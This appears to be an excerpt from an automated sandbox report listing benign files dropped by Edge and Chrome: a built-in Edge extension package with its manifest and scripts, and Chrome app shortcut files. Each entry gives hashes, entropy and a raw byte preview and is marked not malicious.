                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_324126946\493c1397-d4fe-4f1f-a7fb-42f2bdcee814.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_324126946\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_324126946\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_324126946\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_324126946\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                                                                                                                Entropy (8bit):3.9789795438473092
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:83w0dyTeBUGHiZidAKZdA1oehwiZUklqehLy+3:8g5THaky
                                                                                                                                                                                                                                                                MD5:5190D01ECCE82AD9F32F591A46A204F1
                                                                                                                                                                                                                                                                SHA1:96AA4DA6EBFC5F28BB9629608EF8AD31BE06681E
                                                                                                                                                                                                                                                                SHA-256:F6FAA176E971DB760A7D8FC8A2A119D9D70D61951D97C8CB10255CDFCAF36AA1
                                                                                                                                                                                                                                                                SHA-512:5CEB6D08A215986DD9D221E1618387039A55C77E2000CC5528CFD13606DB09CBB4ED60FF1FB832B6D64DB1016E7099C0865FAC7A7195D8A812858F2F37FF817B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....y...O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.e....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.e...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2679
                                                                                                                                                                                                                                                                Entropy (8bit):3.996506389759498
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:8mw0dyTeBUGHiZidAKZdA1leh/iZUkAQkqehUy+2:835THw9QBy
                                                                                                                                                                                                                                                                MD5:18DCF5D75A2D3E429FE2F37C9A6E1345
                                                                                                                                                                                                                                                                SHA1:4DA4CFBF2AE1E469AE197210CC05F198F5262C1E
                                                                                                                                                                                                                                                                SHA-256:ACE9C8C9142C29852925C65351A206D8D69DEEE8B97FCA3B4F2DF9C700004CB8
                                                                                                                                                                                                                                                                SHA-512:E9CE24BD6DE7875CBA42DAFA3212FA0211C1DA102E4396A04FB11C90465010053B5783F7DCAF1AF28EE2087167F29865E57D5CA7196ED113F63A0354706B2F47
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,....K...O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.e....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.e...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2693
                                                                                                                                                                                                                                                                Entropy (8bit):4.005394788411606
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:8Ww0dyTeBUbHiZidAKZdA14t5eh7sFiZUkmgqeh7sSy+BX:8H5Tu4noy
                                                                                                                                                                                                                                                                MD5:BA21D6D5F8376A93D562F0AF311626E1
                                                                                                                                                                                                                                                                SHA1:B924235282C15EC7F4C78B5685B5190E71D795C7
                                                                                                                                                                                                                                                                SHA-256:31DDBB105E6F3774F980234B36B0BF800324F6D3171ED40AEFF844AF999A0AA1
                                                                                                                                                                                                                                                                SHA-512:F8F08512D4214F1FF0409951CC8EC652A00B56DAC5D73AD7BDDE44BD37B509AD50CE22466E5FE37962A62C61164282B23E73E731E8EB0CA8C5E23EE01A6FD77F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.e....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                                                                                Entropy (8bit):3.9943145182017887
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:85w0dyTeBUGHiZidAKZdA16ehDiZUkwqehAy+R:8+5THrKy
                                                                                                                                                                                                                                                                MD5:D5A8F8905C63F77D0E037E019DD50345
                                                                                                                                                                                                                                                                SHA1:9EEB0F75A099305DEB3D555285384B41BA2D8823
                                                                                                                                                                                                                                                                SHA-256:F26F3941B46011D35DB9B2BD4C085DA966A4E97CA76FC97368A55B8DEF37004D
                                                                                                                                                                                                                                                                SHA-512:2C08C3024845BE6394B8F106D6571017E59531001975FA237DDB0558814E54045190DFEC50B05F9E43268AA810D770725AA07731A744513D0E5F332651510324
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......z..O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.e....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.e...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                                                                                Entropy (8bit):3.9838712419080973
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:81w0dyTeBUGHiZidAKZdA1UehBiZUk1W1qehWy+C:8i5THL92y
                                                                                                                                                                                                                                                                MD5:E92F5F049432FAB91AF81F1B968C3DBF
                                                                                                                                                                                                                                                                SHA1:BC7D1D1A7FD0C39DFE1D366F07700D4B65067C54
                                                                                                                                                                                                                                                                SHA-256:CF8D122E5B14462C12536ACA409D3485049843587AA1C1775C01EF20FAEC66D6
                                                                                                                                                                                                                                                                SHA-512:DF8C327EBBABC6A4925B2D37AA1B9B76EBDA3459BA59250FD0BC2B8D12D6AE555C81C551D0DDCB801791BC38F2C8C466B3A149237ED4B6822EB314691587A8E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....Q...O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.Y.e....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.e....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.e....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.e..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.e...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2683
                                                                                                                                                                                                                                                                Entropy (8bit):3.9918117216802282
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:86w0dyTeBUGHiZidAKZdA1duTrehOuTbbiZUk5OjqehOuTboy+yT+:8D5THETYTbxWOvTboy7T
                                                                                                                                                                                                                                                                MD5:83B97733F3FD79F4054163E695152DF5
                                                                                                                                                                                                                                                                SHA1:F8400BC003587BF97C6FCCC29F062B1C052BD0A2
                                                                                                                                                                                                                                                                SHA-256:D9617289802FA77EA703FFA5008B8EB6269D220C41A293788BC27787CBA98D8D
                                                                                                                                                                                                                                                                SHA-512:411732C8E9AE22ABD0829587154A313426E377D9B7BF9D72D315429A1448EF679955D6E85BA45B38EE68EA7F78659681EAB3C3694C4533E9A3CAA663DBA19545
                                                                                                                                                                                                                                                                Malicious:false
